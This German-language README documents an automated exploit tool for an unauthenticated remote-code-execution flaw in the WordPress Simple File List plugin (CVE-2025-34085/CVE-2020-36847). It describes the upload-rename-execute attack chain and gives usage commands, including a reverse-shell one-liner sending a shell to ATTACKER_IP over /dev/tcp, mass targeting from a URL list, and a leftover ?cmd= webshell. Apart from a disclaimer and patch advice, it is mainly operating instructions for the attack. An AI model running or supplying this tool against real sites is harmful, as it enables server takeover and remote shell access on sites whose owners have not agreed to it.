
Exploit für CVE-2025-34085
Ein automatisierter Exploit für CVE-2025-34085 (Duplikat von CVE-2020-36847), eine kritische, nicht authentifizierte Remote-Codeausführungs-Sicherheitslücke im WordPress Simple File List Plugin Versionen ≤ 4.2.2.
Hinweis: CVE-2025-34085 wurde von MITRE als Duplikat von CVE-2020-36847 abgelehnt. Die Sicherheitslücke ist real und in Version 4.2.3 behoben. Beide CVE-IDs beziehen sich auf das gleiche zugrundeliegende Problem.
| Feld | Detail |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Betroffene Versionen | ≤ 4.2.2 |
| Behobene Version | 4.2.3 |
| Typ | Unrestricted File Upload → Rename Bypass → RCE |
| CVSS | 9.8 (Kritisch) |
| Authentifizierung | Keine erforderlich |
| Ursprüngliche Entdeckung | coiffeur |
| Metasploit-Modul | exploit/multi/http/wp_simple_file_list_rce |
Upload — Ein PHP-Payload wird als .png-Datei getarnt über den Upload-Endpunkt des Plugins (ee-upload-engine.php) hochgeladen. Die Upload-Engine validiert Erweiterungen, akzeptiert aber Bilddateien.
Umbenennen — Die Umbenennungsfunktion des Plugins (ee-file-engine.php) erzwingt keine Erweiterungsbeschränkungen. Der Angreifer benennt die .png in .php (oder .phtml, .php5, .php3) um.
Ausführen — Die umbenannte PHP-Datei ist nun im Uploads-Verzeichnis unter /wp-content/uploads/simple-file-list/ zugänglich und ausführbar, was dem Angreifer die Ausführung beliebiger Befehle ermöglicht.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=-Parameter)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Erstellen Sie eine targets.txt-Datei mit einer URL pro Zeile:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
Tipp: Verwenden Sie
--inline, wenn Sie eine Reverse-Shell benötigen oder wenn das Ziel eine Query-String-Filterung hat. Ohne--inlinehinterlässt der Exploit eine Webshell, die Befehle über?cmd=akzeptiert.
Erfolgreiche Exploits werden in vuln.txt protokolliert:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.php bestehenvuln.txt protokolliert – nützlich für Ihren Bericht--inline mit einer Reverse-Shell, um eine persistente Webshell mit ?cmd= zu vermeidenAktualisieren Sie das Simple File List Plugin auf Version 4.2.3 oder höher.
Dieses Tool ist ausschließlich für autorisierte Penetrationstests und zu Bildungszwecken bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets die entsprechende Genehmigung ein.
| Argument | Beschreibung | Standard |
|---|
-u, --url | URL eines einzelnen Ziels | — |
--cmd | Auf dem Ziel auszuführender Befehl | id |
--inline | Befehl direkt in die PHP-Shell einfügen (fest codiert, kein ?cmd= Webshell) | False |